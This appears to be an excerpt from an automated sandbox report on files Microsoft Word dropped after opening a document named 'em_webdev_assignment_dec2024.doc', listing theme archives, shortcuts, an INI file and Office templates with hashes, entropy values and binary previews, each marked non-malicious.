                                                  Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):698244
                                                  Entropy (8bit):7.997838239368002
                                                  Encrypted:true
                                                  SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                  MD5:E29CE2663A56A1444EAA3732FFB82940
                                                  SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                  SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                  SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                  Malicious:false
                                                  Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):1065873
                                                  Entropy (8bit):7.998277814657051
                                                  Encrypted:true
                                                  SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                  MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                  SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                  SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                  SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                  Malicious:false
                                                  Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):953453
                                                  Entropy (8bit):7.99899040756787
                                                  Encrypted:true
                                                  SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                  MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                  SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                  SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                  SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                  Malicious:false
                                                  Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):30
                                                  Entropy (8bit):1.172253928364927
                                                  Encrypted:false
                                                  SSDEEP:3:zet:
                                                  MD5:8DB902A299E2A234F56F22BE94983111
                                                  SHA1:E6F665EC3B38CDD1B2D194D6FB577753FF8F645F
                                                  SHA-256:7FD17786F34BDCDAC83B2A99AD29067DC8D148841F839B22F182110867946DB7
                                                  SHA-512:5EB72B1E3FA171BAAE348D1ECEFC1112AB2E55166D1C895C5A14ADC3B77DAE2E0CB8159EF7147BEF58F6CF6FA290B759CAAD6AC7E0C5F87CE0CCB41BB47D252D
                                                  Malicious:false
                                                  Preview:..............................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Fri Dec 20 22:13:04 2024, mtime=Fri Dec 20 22:14:10 2024, atime=Fri Dec 20 22:14:10 2024, length=0, window=hide
                                                  Category:dropped
                                                  Size (bytes):1164
                                                  Entropy (8bit):4.695306518361306
                                                  Encrypted:false
                                                  SSDEEP:12:8L2EM4UlGIDWlCICH26c2gQ/+zKdd0/k9uLwiTcqBXtDTVl+EjAArHSuT1lilG3Y:8yGUWKH/pd6II7zKQAAmuTqTjg/qyFm
                                                  MD5:81770A34B3C5D0EDE395BBBA3E1E36AE
                                                  SHA1:6A3CE31DF2289DED1729193007488EB5A81B2D12
                                                  SHA-256:E66F8F6924FD4CBDD092477B710CBED50567BDF9F4061B301C05D7CCF5134199
                                                  SHA-512:73B18EAD66B9240DC71C053EB8DA9D3032D02DC771581AAC078EFF73166117350651B42A4683869AA5EA1429B6D025A7DBA29D440E0A958BA34466C9D39C5C4B
                                                  Malicious:false
                                                  Preview:L..................F...........4S..e...4S..|q..4S..........................[....P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.Y......................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......Y....user.<......CW.^.Y...............................j.o.n.e.s.....V.1.....CW.^..AppData.@......CW.^.Y.............................%..A.p.p.D.a.t.a.....V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1......Y....MICROS~1..D......CW.^.Y............................."..M.i.c.r.o.s.o.f.t.....\.1......Y...TEMPLA~1..D......Y...Y.............................(.T.e.m.p.l.a.t.e.s.......a...............-.......`............F.......C:\Users\user\AppData\Roaming\Microsoft\Templates........\.....\.T.e.m.p.l.a.t.e.s...........................>.e.L.:..er.=....`.......X.......065367...........hT..CrF.f4... .y...(....,.......hT..CrF.f4... .y...(....,..................1SPS.XF.L8C....&.m.q............/...S
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:30 2023, mtime=Fri Dec 20 22:13:08 2024, atime=Fri Dec 20 22:13:02 2024, length=86528, window=hide
                                                  Category:dropped
                                                  Size (bytes):605
                                                  Entropy (8bit):4.732389497807379
                                                  Encrypted:false
                                                  SSDEEP:12:8/t3/KAMmZPXdgut/mhjALYkIAAqegut/mTgZqEBmV:8/tpBZfdgutOVAL3IA+gutOTgLBm
                                                  MD5:5FA51C62F0EA4EDF308E77D769401060
                                                  SHA1:12DD02A2214B6125875413FD5A27DFF0114A5EA2
                                                  SHA-256:9BDA8BCBEE23E66837110A153973AF42095D6337E28745D26AA58292203E40AC
                                                  SHA-512:2CB63BF7F4F612E6C83A481B5C7DAB05A0506E220C5CA412289AE42A3325028F843B699442343A85F9DE5C4D8C4C08FD99F32B6900048D50431BEC1691F40070
                                                  Malicious:false
                                                  Preview:L..................F.... ...q.d.......l.4S.....4S...R..........................2..R...Y.. .EM_WEB~1.DOC..r......DWP`.Y............................P...e.m._.w.e.b.d.e.v._.a.s.s.i.g.n.m.e.n.t._.d.e.c.2.0.2.4...d.o.c.......f...............-.......e............F.......C:\Users\user\Desktop\em_webdev_assignment_dec2024.doc..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.m._.w.e.b.d.e.v._.a.s.s.i.g.n.m.e.n.t._.d.e.c.2.0.2.4...d.o.c.`.......X.......065367...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Generic INItialization configuration [folders]
                                                  Category:dropped
                                                  Size (bytes):107
                                                  Entropy (8bit):4.731067890477126
                                                  Encrypted:false
                                                  SSDEEP:3:M1YHYqCj7GjLFXVom4gzHYqCj7GjLFXVopnbJlv:MKHYq1jLjtzHYq1jLjiv
                                                  MD5:24E3D70F94541E53E838764AA398F00A
                                                  SHA1:67F1215FB08C8A603CA9EFE8E840375A7BF365A9
                                                  SHA-256:4041EF3927A9E04AF7858DF7FF449F4DBD9421EA137CC02ADDA333D507CD9A79
                                                  SHA-512:001650A02053F9F9EA379C5022ACEFA54201CF5D36EBFFC63EBC8BC884A4AD142110CF5F5555F011670A3AD3319BBB1D004E1D0C56D1A7DFF99E59938B6C9FE4
                                                  Malicious:false
                                                  Preview:[doc]..em_webdev_assignment_dec2024.LNK=0..[folders]..em_webdev_assignment_dec2024.LNK=0..Templates.LNK=0..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):562113
                                                  Entropy (8bit):7.67409707491542
                                                  Encrypted:false
                                                  SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                  MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                  SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                  SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                  SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1649585
                                                  Entropy (8bit):7.875240099125746
                                                  Encrypted:false
                                                  SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                  MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                  SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                  SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                  SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                  Malicious:false
                                                  Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):558035
                                                  Entropy (8bit):7.696653383430889
                                                  Encrypted:false
                                                  SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                  MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                  SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                  SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                  SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):570901
                                                  Entropy (8bit):7.674434888248144
                                                  Encrypted:false
                                                  SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                  MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                  SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                  SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                  SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):523048
                                                  Entropy (8bit):7.715248170753013
                                                  Encrypted:false
                                                  SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                  MD5:C276F590BB846309A5E30ADC35C502AD
                                                  SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                  SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                  SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3078052
                                                  Entropy (8bit):7.954129852655753
                                                  Encrypted:false
                                                  SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                  MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                  SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                  SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                  SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                  Malicious:false
                                                  Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):777647
                                                  Entropy (8bit):7.689662652914981
                                                  Encrypted:false
                                                  SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                  MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                  SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                  SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                  SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                  Malicious:false
